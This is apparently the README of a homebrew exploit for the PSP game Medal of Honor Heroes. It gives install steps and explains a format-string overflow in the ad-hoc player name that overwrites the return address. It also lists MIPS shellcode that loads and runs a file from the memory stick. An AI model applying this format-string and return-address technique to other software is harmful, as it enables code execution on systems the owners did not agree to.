MOHH (1) exploit by kgsws (second version)

What you need:
	- NON-CFW PSP
	- this archive ... but you have it, don't you?

How to do it:
	- backup your MOHH savegame (if any)
	- copy entire ms0 folder to memstick root
	- run MOHH
	- do not change any setting
	- create AdHoc game
	- sucide - try rocket, that's fast ;)

Important:
	- do not change any setting! :)
	- this is not savegame exploit, savegame just hold all important data to do get name exploit working.
	- if there is something bad in english, correct me :)

Some info about "src":
In folder "hx" is source code of hx file (my intro + menu).
In folder "sdk" is source of test file.
Why two folders?
"hx" file is loaded to address 0x08DAF840, if you want to create your own program that will run directly after exploiting, use this folder. maybe HEN :)
"test" file is loaded to 0x08E50000 by my menu program, if you want to create games, use this folder and let others choose game in my menu.

Some info about exploit:
As first version, player name is vulerable to format-string exploit.
You can't have player name too long, format-string exploit is only way.
If you put exactly 530 characters in name (by format-string), next characters will overwrite $ra register.
Note that string is unicode, if you want put there exact address, you must set UTF-8 encoding to your address.
OK, 530 characters only for on-sucide exploit.
Exploit code is stored in profile name, new $ra points here + 4.
Exploit code just load ms0:/hx.
It should load max 18,3 MB to address 0x08DAF840 and execute it from there.

Profile name code (addresses on execution = 0x08DAF840):
#addr 0x08DAF83C
#	kgsw
#addr 0x08DAF840
	lui	$a0, 0x08DB
#addr 0x08DAF844
	addi	$a0, $a0, -1932 # *path
#addr 0x08DAF848
	li	$a1, 0x0801 # flags (PSP_O_RDONLY | PSP_O_EXCL)
#addr 0x08DAF84C
	jal	0x08C92BE4 # sceIoOpen
#addr 0x08DAF850
	li	$a2, 0x0309 # mode
#addr 0x08DAF854
	lui	$a1, 0x08DB
#addr 0x08DAF858
	addi	$a1, $a1, -1932 # *ptr
#addr 0x08DAF85C
	lui	$a2, 0x0125 # size
#addr 0x08DAF860
	nop	# game put here '\0'
#addr 0x08DAF864
	jal	0x08C92B94 # sceIoRead
#addr 0x08DAF868
	andi	$a0, $v0, 0xFFFF # uid
#addr 0x08DAF86C
	jal	0x08C9299C # sceKernelDcacheWritebackInvalidateAll
#addr 0x08DAF870
	nop
#addr 0x08DAF874
#	ms0:
#	/hx

